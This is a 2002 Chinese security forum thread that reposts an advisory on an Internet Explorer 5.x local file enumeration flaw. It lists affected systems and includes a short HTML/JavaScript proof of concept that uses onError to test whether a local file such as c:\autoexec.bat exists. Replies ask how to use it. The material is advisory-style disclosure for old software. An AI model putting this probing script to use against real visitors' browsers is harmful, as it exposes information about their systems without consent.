|
 | 作者: group [group]
 论坛用户 |
登录 |
| IE本地文件列举漏洞 发布日期 Jan 03, 2002 受影响的系统 Microsoft Internet Explorer 5.01 - Microsoft Windows 95 - Microsoft Windows 98 + Microsoft Windows ME + Microsoft Windows 2000 + Microsoft Windows 2000 SP1 + Microsoft Windows 2000 SP2 + Microsoft Windows 2000 Terminal Services - Microsoft Windows NT 4.0SP3 - Microsoft Windows NT 4.0SP4 - Microsoft Windows NT 4.0SP5 - Microsoft Windows NT 4.0SP6 - Microsoft Windows NT 4.0SP6a Microsoft Internet Explorer 5.0 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 2000 - Microsoft Windows 2000 SP1 - Microsoft Windows 2000 SP2 - Microsoft Windows NT 4.0SP3 - Microsoft Windows NT 4.0SP4 - Microsoft Windows NT 4.0SP5 - Microsoft Windows NT 4.0SP6 - Microsoft Windows NT 4.0SP6a Microsoft Internet Explorer 5.0.1SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 2000 - Microsoft Windows 2000 SP1 - Microsoft Windows 2000 SP2 - Microsoft Windows NT 4.0SP3 - Microsoft Windows NT 4.0SP4 - Microsoft Windows NT 4.0SP5 - Microsoft Windows NT 4.0SP6 - Microsoft Windows NT 4.0SP6a Microsoft Internet Explorer 5.0.1SP1 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 2000 - Microsoft Windows 2000 SP1 - Microsoft Windows 2000 SP2 - Microsoft Windows NT 4.0SP3 - Microsoft Windows NT 4.0SP4 - Microsoft Windows NT 4.0SP5 - Microsoft Windows NT 4.0SP6 - Microsoft Windows NT 4.0SP6a Microsoft Internet Explorer 5.5SP2 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 98se - Microsoft Windows ME - Microsoft Windows 2000 - Microsoft Windows 2000 SP1 - Microsoft Windows 2000 SP2 - Microsoft Windows 2000 Terminal Services - Microsoft Windows NT 4.0SP3 - Microsoft Windows NT 4.0SP4 - Microsoft Windows NT 4.0SP5 - Microsoft Windows NT 4.0SP6 - Microsoft Windows NT 4.0SP6a - Microsoft Windows NT Enterprise Server 4.0 - Microsoft Windows NT Terminal Server 4.0 Microsoft Internet Explorer 5.5SP1 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 2000 - Microsoft Windows 2000 SP1 - Microsoft Windows 2000 SP2 - Microsoft Windows NT 4.0SP3 - Microsoft Windows NT 4.0SP4 - Microsoft Windows NT 4.0SP5 - Microsoft Windows NT 4.0SP6 - Microsoft Windows NT 4.0SP6a Microsoft Internet Explorer 5.5 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 2000 - Microsoft Windows 2000 SP1 - Microsoft Windows 2000 SP2 - Microsoft Windows NT 4.0SP3 - Microsoft Windows NT 4.0SP4 - Microsoft Windows NT 4.0SP5 - Microsoft Windows NT 4.0SP6 - Microsoft Windows NT 4.0SP6a 不受影响系统: Microsoft Internet Explorer 6.0 - Microsoft Windows 98 - Microsoft Windows 98se - Microsoft Windows ME - Microsoft Windows 2000 - Microsoft Windows 2000 SP1 - Microsoft Windows 2000 SP2 - Microsoft Windows NT 4.0SP6a IE的这个漏洞可能会对恶意网站暴露敏感信息 当脚本中引用了在当前文件之外的文件时,如果这个文件不存在,就会触发onError事件。该脚本可以用“files://”在本地检测引用的目标文件是否存在 以下代码仅供测试,请勿用于非法用途 <html> <head> <script language="javascript"> <!-- var fileExists = false; function yes() { alert("the file exists."); yes = true; } function no() { if(!fileExists) { alert("the file does not exist."); } } window.onerror = yes window.onload = no //--> </script> <script language="javascript" src="file://c:\autoexec.bat"></script> </head> </html> 解决方法: 禁止Javascript脚本 |
| 地主 发表时间: 1/6 18:40 |
 | 回复: invade [invade]  论坛用户 |
登录 |
|
那么多哇! |
| B1层 发表时间: 1/6 20:4 |
 | 回复: lkfantasy [lkfantasy] 论坛用户 |
登录 |
|
能具体说下这个漏洞怎么利用吗? |
| B2层 发表时间: 1/13 19:14 |
| 回复: group [group] 论坛用户 |
登录 |
|
上面不是给出了攻击代码么 |
| B3层 发表时间: 1/14 3:52 |
 | 回复: sorcerer [sorcerer] 论坛用户 |
登录 |
|
哦? http://netsword.net/ 这里的文章吧?我说我好象有印象呢...你也去那吗?那里也是这个名字? |
| B4层 发表时间: 1/16 6:11 |
| 回复: group [group] 论坛用户 |
登录 |
|
没有,偶没去哪里 |
| B5层 发表时间: 1/16 11:0 |
| 回复: lkfantasy [lkfantasy] 论坛用户 |
登录 |
|
咋不好使呢? |
| B6层 发表时间: 1/16 14:42 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: IE本地文件列举漏洞(最新翻译)